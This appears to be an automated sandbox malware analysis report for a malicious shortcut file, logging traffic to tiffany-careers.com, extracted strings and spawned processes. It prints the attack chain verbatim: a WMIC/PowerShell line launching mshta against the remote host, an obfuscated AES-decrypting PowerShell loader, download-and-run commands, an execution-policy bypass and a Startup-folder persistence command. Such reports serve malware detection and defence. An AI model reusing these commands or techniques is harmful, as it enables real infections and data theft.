Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 147.45.49.155:443
Source: global traffic | HTTP traffic detected: GET /baochuan1 HTTP/1.1 | Accept: */* | Accept-Language: en-CH | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: tiffany-careers.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /gIpBYOi HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: tiffany-careers.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe | Code function: 15_2_00007FF7BB86E968 InternetQueryDataAvailable,InternetReadFile
Source: global traffic | DNS traffic detected: DNS query: tiffany-careers.com
Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic | DNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.dr | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.dr | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.7.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000008.00000002.3499608749.000002AB96E9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8705A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.2089152585.0000021D26245000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2312678509.000002AB86E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80AA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8705A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 00000016.00000000.2409567438.0000000000EA9000.00000002.00000001.01000000.00000010.sdmp, Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 0000001B.00000000.2554375542.0000000000939000.00000002.00000001.01000000.00000011.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000014.00000002.2525206353.0000029EF5DE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: 2D85F72862B55C4EADD9E66E06947F3D0.13.drString found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000005.00000002.2089152585.0000021D2628C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2089152585.0000021D26263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2312678509.000002AB86E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.3499608749.000002AB96E9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.3499608749.000002AB96E9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.3499608749.000002AB96E9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000007.00000003.2119800024.000001DC580D3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000007.00000003.2119800024.000001DC58060000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8705A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.3499608749.000002AB96E9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.c
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.co
Source: WMIC.exe, 00000000.00000003.2061399182.000002902AA07000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000000.00000002.2063481089.000002902AA09000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2312678509.000002AB8705A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80AA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8705A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/Job_Description.pdf
Source: powershell.exe, 00000005.00000002.2089152585.0000021D2672E000.00000004.00000800.00020000.00000000.sdmp, FzmtNV0vnG.lnkString found in binary or memory: https://tiffany-careers.com/baochuan1
Source: powershell.exeString found in binary or memory: https://tiffany-careers.com/baochuan1$global:?
Source: powershell.exe, 00000005.00000002.2089011782.0000021D24620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/baochuan1;.
Source: powershell.exe, 00000005.00000002.2088198399.0000021D243AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/baochuan1Y0
Source: powershell.exe, 00000005.00000002.2089152585.0000021D266D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/baochuan1h
Source: powershell.exe, 00000005.00000002.2089152585.0000021D26231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/baochuan1p
Source: rMpqCJnPv.exe, 0000000F.00000002.2357940183.0000021B0E419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/gIpBYOi
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/rMpqCJnPv.exe
Source: powershell.exe, 00000014.00000002.2415190545.0000029E80231000.00000004.00000800.00020000.00000000.sdmp, PublicProfile.ps1.15.drString found in binary or memory: https://tiffany-careers.com/ygUmFny.txt
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Guard.exe.16.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB870A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,15_2_00007FF7BB870A6C
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB870D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,15_2_00007FF7BB870D24
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB7E1CEC GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,15_2_00007FF7BB7E1CEC

System Summary

Source: powershell.exe, 00000008.00000002.3499608749.000002AB9706F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_db922962-2
Source: powershell.exe, 00000008.00000002.3499608749.000002AB9706F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_3bc08da0-0
Source: powershell.exe, 00000008.00000002.3499608749.000002AB972FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_07ac97da-b
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: This is a third-party compiled AutoIt script.15_2_00007FF7BB7E37B0
Source: rMpqCJnPv.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: rMpqCJnPv.exe, 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_cafa066c-0
Source: rMpqCJnPv.exe.8.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_56868ea1-b
Source: WMIC.exe, 00000000.00000002.2063394355.000002902A9D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32\Wbem\wmic.exe"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')"C:\Users\user\Desktop\FzmtNV0vnG.lnkWinsta0\Defaultmemstr_423e07b3-c
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: FzmtNV0vnG.lnkLNK file: process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')"
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB85C110: CreateFileW,DeviceIoControl,CloseHandle,15_2_00007FF7BB85C110
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB84D2C4 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,15_2_00007FF7BB84D2C4
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB85D750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,15_2_00007FF7BB85D750
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: String function: 00007FF7BB808D58 appears 76 times
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2595
Source: classification engineClassification label: mal100.expl.evad.winLNK@43/61@4/2
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB863778 GetLastError,FormatMessageW,15_2_00007FF7BB863778
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB84D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,15_2_00007FF7BB84D5CC
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB84CCE0 AdjustTokenPrivileges,CloseHandle,15_2_00007FF7BB84CCE0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8659D8 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,15_2_00007FF7BB8659D8
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB85BE00 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,15_2_00007FF7BB85BE00
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB865F2C CoInitialize,CoCreateInstance,CoUninitialize,15_2_00007FF7BB865F2C
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB7E6580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,15_2_00007FF7BB7E6580
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2604:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5om35xfj.vi5.ps1Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: FzmtNV0vnG.lnkVirustotal: Detection: 26%
Source: FzmtNV0vnG.lnkReversingLabs: Detection: 21%
Source: unknown Process created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')"
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/baochuan1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/baochuan1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function vxx ($xHDThLVi){return -split ($xHDThLVi -replace '..', '0x$& ')};$FMAPhot = vxx($ddg.SubString(0, 2048));$pBL = [System.Security.Cryptography.Aes]::Create();$pBL.Key = vxx($ddg.SubString(2048));$pBL.IV = New-Object byte[] 16;$KNBWNbH = $pBL.CreateDecryptor();$NjZFZrE = [System.String]::new($KNBWNbH.TransformFinalBlock($FMAPhot, 0,$FMAPhot.Length)); sal fd $NjZFZrE.Substring(3,3); fd $NjZFZrE.Substring(6)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1656,i,6298120100990453940,17586476426563717861,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe "C:\Users\user\AppData\Roaming\rMpqCJnPv.exe"
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
